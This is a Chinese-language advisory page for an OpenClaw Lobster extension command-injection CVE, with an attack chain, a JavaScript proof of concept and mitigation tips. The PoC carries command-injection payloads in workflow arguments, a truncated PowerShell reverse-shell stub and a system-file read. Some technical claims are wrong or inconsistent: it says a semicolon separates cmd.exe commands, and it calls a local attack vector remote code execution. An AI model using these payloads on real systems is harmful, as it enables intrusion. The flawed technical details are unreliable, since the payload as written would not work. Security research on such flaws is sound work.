CVE-2026-31995 OpenClaw Lobster扩展Windows shell命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-31995

漏洞类型

命令注入

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

CVE-2026-31995是OpenClaw软件中Lobster扩展的一个命令注入漏洞。该漏洞存在于OpenClaw版本2026.1.21至2026.2.19之间，主要影响Windows平台。漏洞的根本原因在于Lobster扩展的Windows shell回退机制存在安全缺陷，当进程生成失败触发shell回退且shell参数设置为true时，攻击者可以通过控制工作流参数注入任意命令。由于cmd.exe的命令解释特性，恶意构造的参数会被作为系统命令执行，从而导致远程代码执行。攻击者需要具备低权限即可利用此漏洞，无需用户交互即可完成攻击。该漏洞的完整性影响评级为高，表明攻击者能够修改系统文件或配置，而机密性影响同样为高，意味着敏感信息可能遭到泄露。

技术细节

该命令注入漏洞的技术原理涉及OpenClaw的Lobster扩展在Windows环境下的shell回退机制。当Lobster扩展尝试通过spawn函数启动外部进程时，如果spawn操作失败，系统会触发shell回退逻辑，将shell参数设置为true并使用cmd.exe来执行命令。问题在于，攻击者可以通过精心构造的工作流参数，在参数中嵌入恶意命令。当这些参数被传递给cmd.exe时，cmd.exe会将其作为命令行参数解释执行，从而导致命令注入。例如，如果参数中包含分号或管道等特殊字符，cmd.exe会将分号后的内容作为独立命令执行。攻击者利用这一特性，只需控制工作流中的工具参数，即可注入任意系统命令，实现对目标系统的完全控制。修复版本为2026.2.19及之后的版本，开发者通过修改shell回退逻辑或对参数进行严格的输入验证来消除该漏洞。

攻击链分析

STEP 1

步骤1

攻击者获取OpenClaw工作流的访问权限，能够创建或修改工作流配置

STEP 2

步骤2

攻击者构造包含恶意命令的Lobster扩展工具参数，利用分号、管道等cmd.exe特殊字符注入额外命令

STEP 3

步骤3

触发spawn操作失败，使Lobster扩展的Windows shell回退机制被激活

STEP 4

步骤4

Shell回退将shell参数设置为true，调用cmd.exe执行命令

STEP 5

步骤5

cmd.exe解析参数时将注入的命令作为独立命令执行，攻击者实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-31995 PoC - OpenClaw Lobster Extension Command Injection
// This PoC demonstrates command injection through workflow arguments
// when spawn failure triggers Windows shell fallback

// Malicious workflow configuration that exploits the vulnerability
const maliciousWorkflow = {
  extension: 'lobster',
  tool: 'execute_command',
  args: {
    // Command injection payload using cmd.exe special characters
    target: 'legitimate_command; whoami > C:\\temp\\pwned.txt',
    timeout: 5000
  },
  fallback: {
    enabled: true,
    shell: true  // This triggers the vulnerable shell fallback
  }
};

// Alternative payload variations:
// 1. Reverse shell: target: 'calc.exe && powershell -c "$client = New-Object System.Net.Sockets.TCPClient..."'
// 2. File write: target: 'echo test > C:\\temp\\output.txt'
// 3. Multiple commands: target: 'dir & type C:\\Windows\\win.ini'

// Exploitation scenario:
// 1. Attacker crafts malicious workflow with injected commands
// 2. Workflow triggers spawn failure in Lobster extension
// 3. Shell fallback mechanism activates with shell: true
// 4. cmd.exe interprets injected commands via argument parsing
// 5. Malicious commands execute with same privileges as OpenClaw process

影响范围

OpenClaw 2026.1.21

OpenClaw < 2026.2.19

防御指南

临时缓解措施

在官方修复发布之前，建议采取以下临时缓解措施：1)限制OpenClaw工作流的创建和修改权限，仅允许可信用户操作；2)在Windows环境中部署应用程序白名单机制，阻止未经授权的可执行文件运行；3)监控OpenClaw进程的文件系统和网络活动，及时发现异常行为；4)考虑在隔离环境中运行Lobster扩展，限制潜在攻击的影响范围。